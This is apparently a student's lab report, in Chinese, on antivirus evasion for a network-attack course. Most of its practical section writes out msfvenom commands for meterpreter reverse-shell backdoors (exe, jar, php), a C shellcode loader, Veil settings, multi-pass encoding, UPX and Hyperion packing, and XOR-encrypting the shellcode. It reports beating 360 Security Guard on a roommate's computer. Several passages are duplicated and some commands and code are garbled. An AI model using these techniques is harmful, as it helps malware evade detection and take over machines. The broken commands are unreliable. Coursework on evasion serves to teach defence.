2018-2019-2 网络对抗技术 20165239 Exp3 免杀原理与实践
win10 ip地址 192.168.18.1
fenix ip地址为 192.168.18.128
(1)杀软是如何检测出恶意代码的?
•根据计算机病毒课程知道了每个病毒都有其对应的特征码,杀软是根据这些特征码来判定他是不是病毒。
•根据该软件的行为进行检测如有异常行为,会被判定为风险文件或病毒。
•基于行为的恶意软件检测:在启发式基础上对软件行为进行监控
(2)免杀是做什么?
通过一定的技术手段,将恶意软件处理,使之不会被杀毒软件发现。
(3)免杀的基本方法有哪些?
•改变特征码:对于.exe文件可以加壳,对于shellcode可以进行加密然后利用shellcode生成可执行文件,或者用其他语言进行重写再编译
•改变行为:根据改变通讯模式、操作模式来实现免杀。
- 实践内容
任务一: 正确使用msf编码器(0.5分),msfvenom生成如jar之类的其他文件(0.5分),veil-evasion(0.5分),加壳工具(0.5分),使用shellcode编程(1分)
1.使用VirusTotal或Virscan这两个网站对实验二生成的后门程序进行扫描。
•VirusTotal扫描后结果如下:
2.用msf编码器对后门程序进行一次到多次的编码,并进行检测
•一次编码使用命令:
•VirusTotal扫描后结果如下:
•十次编码使用命令:msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=192.168.1.241 LPORT=5336 -f exe > met-encoded10.exe
•VirusTotal扫描后结果如下:
3.msfvenom生成jar文件、php文件
•生成java后门程序使用命令:
msfvenom -p java/meterpreter/reverse_tcp LHOST=192.168.18.128 LPORT=5239 x> 5239_backdoor_java.jar
•VirusTotal扫描后结果如下:
•生成php后门程序使用命令:msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.18.128LPORT=5239 x> 5239_backdoor.php
•VirusTotal扫描后结果如下:
4.使用veil-evasion生成后门程序及检测
•安装veil
代码
:sudo apt-get install veil
•安好后use evasion命令进入Evil-Evasion
•设置反弹连接IP,set LHOST 192.168.18.128,IP是KaliIP;设置端口set LPORT 5239命令use c/meterpreter/rev_tcp.py进入配置界面
•设置反弹连接IP,set LHOST 192.168.18.128,IP是KaliIP;设置端口set LPORT 5239
•指令generate生成文件,输入playload的名字:veil_c_5239
•VirusTotal扫描后结果如下
5.手工注入Shellcode并执行
•使用命令:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.18.128 LPORT=5239-f c用c语言生成一段shellcode;
•vim 20165239.c,然后将unsigned char buf[]赋值到其中
unsigned char buf[] =
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.18.128 LPORT=5239 -f c生成的代码 加
int main()
{
int (func)() = (int()())buf;
func();
}
•使用命令:i686-w64-mingw32-g++ 20165239.c -o 20165239.exe编译这个.c文件为可执行文件;
•VirusTotal扫描后结果如下
6.加壳尝试
•加压缩壳upx 20165239.exe -o 20165239_uped.exe
•VirusTotal扫描后结果如下:
•加密壳Hyperion:进入目录/usr/share/windows-binaries/hyperion/中将20165239_uped.exe拷贝进来并用wine hyperion.exe -v 20165239_upxed.exe 20165239_upxed_Hyperion.exe进行加壳
•VirusTotal扫描后结果如下:
任务二:通过组合应用各种技术实现恶意代码免杀(0.5分)
•用codeblocks的C语言将前面的.c文件里的shellcode加密(加密方式为加五在异或0x66)得到下图的shellcode,然后在进行加压缩壳。
•实现免杀效果,并回连成功 杀毒软件为360安全卫士
的C语言将前面的.c文件里的shellcode加密(加密方式为加五在异或0x66)得到下图的shellcode,然后在进行加压缩壳
任务二:通过组合应用各种技术实现恶意代码免杀(0.5分)
•用codeblocks的C语言将前面的.c文件里的shellcode加密(加密方式为加五在异或0x66)得到下图的shellcode,然后在进行加压缩壳
任务三:用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本(加分0.5)
•对舍友电脑进行免杀效果测试并回连成功(舍友的杀软为最新的360安全卫士11)
实验感想:
本次实验大多数是我一个人完成的,有些不会则问舍友同学,在安装kali过程中很多都是问舍友,还有查阅网上的资料
